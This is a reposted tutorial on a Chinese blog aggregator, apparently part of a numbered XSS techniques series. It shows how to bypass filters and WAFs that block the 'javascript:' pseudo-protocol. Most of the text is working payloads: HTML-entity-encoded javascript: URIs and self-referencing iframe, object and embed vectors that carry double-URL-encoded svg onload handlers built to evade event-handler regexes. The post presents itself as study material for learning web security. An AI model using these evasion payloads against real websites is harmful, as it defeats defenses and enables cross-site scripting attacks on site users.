zoukankan      html  css  js  c++  java
  • 【XSS技巧拓展】————29、Alternative to Javascript Pseudo-Protocol

    Browsers accept “javascript:” in their address bar as a way to execute javascript code, which makes it a pseudo-protocol instead of a real one like “http:”, for example. It can be used in the same way as an URL when calling an external resource. Example:

    <a href=javascript:alert(1)>

    Contrary to Data URI scheme (“data:”), the javascript one executes in same context of the actual page, being very useful in open redirect vulnerabilities and in some XSS vectors. But it’s as useful as easy to be detected and blocked by a filter or WAF.

    In fact, we can use mixed case and encode it with HTML entities (see an easy-to-use list here) like:

    Javas&#99;ript:alert(1)

    (URL-encoded form)
    Javas%26%2399;ript:alert(1)

    But it’s still easy to flag.

    Here is another way to pass a filter that is blocking “javascript:”. Let’s consider we have the following XSS vector:

    <iframe src=javascript:alert(1)>

    In a generic URL like this:

    http(s)://host/page?p=XSS

    Where “host” is an IP address or domain, “page” is the vulnerable page and “p” is the vulnerable parameter.

    In order to bypass filtering of all forms of “javascript:” we call the same vulnerable URL again with another vector (<svg onload>), this time double URL encoded:

    http(s)://host/page?p=<iframe src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>

    This also respects “X-Frame-Options: SAMEORIGIN” HTTP security header, because it calls itself. Notice that we double encoded key points of the second vector, to avoid regex for event handlers based in “on” plus something and equal sign.

    A live example is here (open it in Firefox).

    Other XSS vectors that work with “javascript:” also work with this self-calling method. Good examples are:

    <object data=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>

    <embed src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>

    See this cheat sheet for more vectors.

    There’s also a variation using HTML entities, which although we are considering them being blocked by filter/WAF, can be used in a slightly different way:

    <iframe src=?p=%26lt;svg/o%256Eload%26equals;alert(1)%26gt;>

    Assuming that filtering only for the HTML entities suitable for “javascript:” are in place.

    #hack2learn

    总会有不期而遇的温暖. 和生生不息的希望。
  • 相关阅读:
    Ajax的工作原理
    ios 应用多语言自由切换实现
    开源码应用之Eclipse篇
    搜索引擎solr和elasticsearch
    字符串截取进阶
    nginx源代码分析--nginx模块解析
    C#网络编程系列文章(五)之Socket实现异步UDPserver
    mysql存储引擎的种类与差别(innodb与myisam)
    程序的记事本--log4net
    在海思hisiv100nptl平台上交叉编译并安装SRS
  • 原文地址:https://www.cnblogs.com/devi1/p/13486379.html
Copyright © 2011-2022 走看看